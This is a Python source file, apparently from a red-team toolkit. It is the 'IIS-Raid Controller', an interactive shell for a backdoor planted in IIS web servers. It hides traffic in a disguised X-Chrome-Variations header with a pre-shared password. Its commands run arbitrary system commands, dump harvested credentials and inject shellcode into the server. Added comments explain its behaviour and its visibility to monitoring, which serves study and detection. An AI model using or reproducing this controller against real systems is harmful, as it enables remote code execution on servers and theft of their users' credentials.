import requests
import argparse
import base64
import cmd
# ASCII-art banner; printed as a module-level side effect as soon as the
# file runs, before argument parsing.
banner = '''
██╗██╗███████╗ ██████╗ █████╗ ██╗██████╗
██║██║██╔════╝ ██╔══██╗██╔══██╗██║██╔══██╗
██║██║███████╗█████╗██████╔╝███████║██║██║ ██║
██║██║╚════██║╚════╝██╔══██╗██╔══██║██║██║ ██║
██║██║███████║ ██║ ██║██║ ██║██║██████╔╝
╚═╝╚═╝╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═════╝
@0x09AL - MDSec ActiveBreach
'''
print(banner)
class Prompt(cmd.Cmd):
    """Interactive ``cmd.Cmd`` shell for the controller.

    Recognised commands are ``cmd``, ``inject``, ``dump`` and ``exit``; each
    ``help_*`` method prints the usage text for the matching ``do_*`` method.
    The ``do_*`` methods delegate to the module-level helpers
    (ExecuteCommand, DumpCreds, InjectShellcode), which in turn read the
    module-level ``args`` namespace.
    """
    def help_cmd(self):
        # Usage text for the ``cmd`` command.
        print("Execute a command on the server.\nUsage: cmd <command to execute>\n")
    def help_exit(self):
        # Usage text for the ``exit`` command.
        print("Exits")
    def help_inject(self):
        # Usage text for the ``inject`` command; the argument is a local file path.
        print("Inject shellcode on the server.\nUsage: inject <file>\n")
    def help_dump(self):
        # Usage text for the ``dump`` command; takes no argument.
        print("Dump extracted credentials.\nUsage: dump\n")
    def do_inject(self,shellcode):
        # ``shellcode`` is the remainder of the input line, passed through
        # unchanged as a file path; no existence check is done here.
        InjectShellcode(shellcode)
    def do_cmd(self, command):
        # An empty argument is rejected before any request is sent.
        if(command != ""):
            ExecuteCommand(command)
        else:
            print("Specify a command.")
    def do_dump(self,ignore):
        # Any argument text is ignored.
        DumpCreds()
    def do_exit(self,ignore):
        # Terminates the whole process; cmdloop() does not return.
        exit(0)
    def emptyline(self):
        # Override cmd.Cmd's default (repeat the last command) so that an
        # empty line is a no-op.
        pass
def SendRequest(data):
    """Send one request to ``args.url`` and return the decoded reply text.

    ``data`` is placed verbatim in the request header named by ``args.header``
    (default ``X-Chrome-Variations``, set by the argument parser below),
    alongside an ``X-Password`` header carrying ``args.password``.  The reply
    is read from the response header of the same name, base64-decoded and
    returned as a UTF-8 string.  Reads the module-level ``args`` namespace.

    Exits the process with status 0 (not a failure code) on a non-200
    response or when the reply header is absent.

    From a monitoring standpoint, every exchange is visible at any proxy or
    server that logs request/response headers: a fixed ``X-Password`` header
    plus a custom header whose value is base64 in both directions.
    """
    if(args.method == "GET"):
        resp = requests.get(args.url,headers={args.header: data , "X-Password": args.password})
    elif(args.method == "POST"):
        resp = requests.post(args.url,headers={args.header: data , "X-Password": args.password})
    # NOTE(review): ``resp`` is only bound for "GET"/"POST"; --method accepts
    # any string, so other values raise NameError on the next line.
    if(resp.status_code != 200):
        print("[-] Status code invalid : " + str(resp.status_code))
        exit(0)
    try:
        encoded_response = resp.headers[args.header]
    except:
        # Bare except: a missing header (KeyError) and any other error here
        # are reported identically and end the run.
        print("[-] Header not found. Invalid password or backdoor is not present. [-]")
        exit(0)
    # Reply header value is expected to be base64 of UTF-8 text; a malformed
    # value raises from b64decode/decode and is not caught.
    response = base64.b64decode(encoded_response).decode('utf-8')
    return response
def Check():
    """Probe ``args.url`` with the ``PIN|G`` message.

    Returns True when the decoded reply is exactly ``PONG``, False for any
    other reply.  Transport or header errors never reach the comparison
    because SendRequest exits the process on them.  Progress is printed to
    stdout.
    """
    print("[+] Testing URL {0}".format(args.url))
    response = SendRequest("PIN|G")
    if(response == "PONG"):
        print("[+] Successfully connected to {0}\n".format(args.url))
        return True
    else:
        return False
def ExecuteCommand(command):
    """Send ``command`` with the ``CMD|`` prefix and print the decoded reply.

    ``command`` is concatenated unchanged; no quoting or length handling is
    done on the client side.  Returns None.
    """
    response = SendRequest("CMD|" + command)
    print("[+] Received output [+]\n{0}".format(response))
def DumpCreds():
    """Send the fixed ``DMP|CREDS`` message and print the decoded reply.

    Takes no arguments and returns None; the reply text is printed as-is.
    """
    response = SendRequest("DMP|CREDS")
    print("[+] Received output [+]\n{0}".format(response))
def InjectShellcode(file):
    """Read ``file`` as raw bytes and send it base64-encoded with the ``INJ|`` prefix.

    ``file`` is opened as given (relative to the current working directory);
    a missing path raises FileNotFoundError from ``open``.  Prints the raw
    byte count before sending and a success line only when the reply is
    exactly ``DONE``; any other reply produces no output.  Returns None.
    """
    with open(file, "rb") as binaryfile :
        shellcode = bytearray(binaryfile.read())
    # Whole payload travels in a single request header value, so its size
    # is bounded by whatever header limits the path to the server enforces.
    encoded_shellcode = base64.b64encode(shellcode).decode("utf-8")
    print("[+] Shellcode size : {0}".format(len(shellcode)))
    response = SendRequest("INJ|" + encoded_shellcode)
    if(response == "DONE"):
        print("[+] Shellcode Injected Successfully")
# IIS-Raid
# Module-level entry point: parse the command line into the global ``args``
# namespace that SendRequest reads, verify connectivity with Check(), then
# hand control to the interactive Prompt shell.
parser = argparse.ArgumentParser(description="IIS-Raid Controller")
parser.add_argument('--url', required=True , type=str ,help="URL to use for communication.")
parser.add_argument('--header', type=str, default="X-Chrome-Variations", help="Header to use for communication.")
# Any string is accepted here, but SendRequest only handles "GET" and "POST".
parser.add_argument('--method', type=str, default="GET", help="Method to use for communication.")
# The password is supplied as a plain CLI argument, so it is visible in
# process listings and shell history on the machine running this script.
parser.add_argument('--password', required=True,type=str, help="Pre-shared password.")
args = parser.parse_args()
if(Check()):
    p = Prompt()
    p.prompt = "IIS-RAID #> "
    # Blocks until do_exit() terminates the process.
    p.cmdloop()
else:
    print("[-] Failed to connect to {0} ".format(args.url))